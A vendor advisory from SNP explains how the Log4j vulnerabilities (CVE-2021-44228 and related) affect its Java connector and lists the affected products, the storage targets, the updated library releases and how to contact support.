(SM-2302) Log4j Vulnerability

Owned by SNP
Feb 16, 2023
3 min read

Updated on May 12th, 2022

Log4j 2.17.2 was released on 23rd of February. This version will be included 

 

  • 2022-02-23

New release 2202 has been published. This release contains the latest version of log4j 2.17.1.

Updated on February 8th, 2022

New release 2202 has been published. This release contains the latest version of log4j 2.17.1.

Updated on January 10th, 2022

On December 28th another security issue was found in Log4j 2.17.0 and a new version 2.17.1 was released.

The latest version is still undergoing reanalysis which may result in further changes. You can find more information on the following link https://nvd.nist.gov/vuln/detail/CVE-2021-44832

 

What is the impact on our customers?

Java connector uses the log4j library for logging information into text files. This means that the recently discovered vulnerable logic of log4j is not used by our software and therefore should cause no harm.

 

How are we responding?

We are going to encapsulate the latest available version of log4j in the upcoming release coming at the beginning of February.

Updated on December 23rd 2021

On December 23rd we have released a new Java connector with the Log4j 2.17.0.

Contact product_support@snpgroup.com for more information.

 

Summary

On December 17th 2021, the Apache Software Foundation released version 2.17.0 of the Log4j Java logging library, fixing the following security issues:

CVE-2021-44228, a remote code execution vulnerability affecting Log4j 2.0-2.14.  An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

CVE-2021-45105, JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

 

What is the impact on our customers?Java connector, which is part of our Storage Management (a component of the Reuse library), contains the Log4j 2.11.1 library which is used for handling log messages. For a full list of products that contain the Storage Management see here:

  • SNP OutBoard™ Data Tiering with NLS

  • SNP OutBoard™ Data Tiering with SDA+

  • SNP OutBoard™ ERP Archiving

  • SNP OutBoard™ DataFridge

  • SNP Glue™

  • SNP Validate

 

Even though the vulnerability of the Log4j library is critical, the threat is relevant only under specific circumstances which are not applicable in the case of our connector.

Java connector is used for communication with external storage technologies listed below.

  • AWS S3

  • AWS Redshift

  • Azure BLOB (if Active Directory authentication or parquet files are used)

  • Azure ADLS Gen1 & Gen2 (if Active Directory authentication or parquet files are used)

  • Azure SQL

  • Azure Synapse

  • Azure Databricks

  • Google Cloud Storage

  • Google BigQuery

  • Snowflake

  • Hive/Impala

 

If you are not using any of the listed target storages, the security issue is not relevant to you, because the Java connector is not installed in your environment. Java libraries are unpacked and stored in a specified directory only after the connection to the specific storage has been configured.

 

How are we responding?

We are working on the preparation of a new version of the Java connector with the fixed Log4j libraries. This will be available in the upcoming days and you will be informed by e-mail once it is available.

 

How should customers proceed?
Check the above information and if you need support with your specific scenario, or have any questions, reach out to us via product_support@snpgroup.com.

 

To accelerate the resolution, including the following information in advance will be very helpful:

  • What storages are you using?

    • For the list of configured connections, use Storage Management, transaction /DVD/SM_SETUP.

  • What version of Reuse Library is installed on your system?

    • Run any of our product transactions (e. g. /DVD/Glue) and click the menu button on the top left with the SNP icon and select the first menu item, (e.g. SNP Glue™ – About).

 

As soon as we have this information from you, we will be able to inform you if there is any security impact and if yes, what steps we recommend to mitigate it.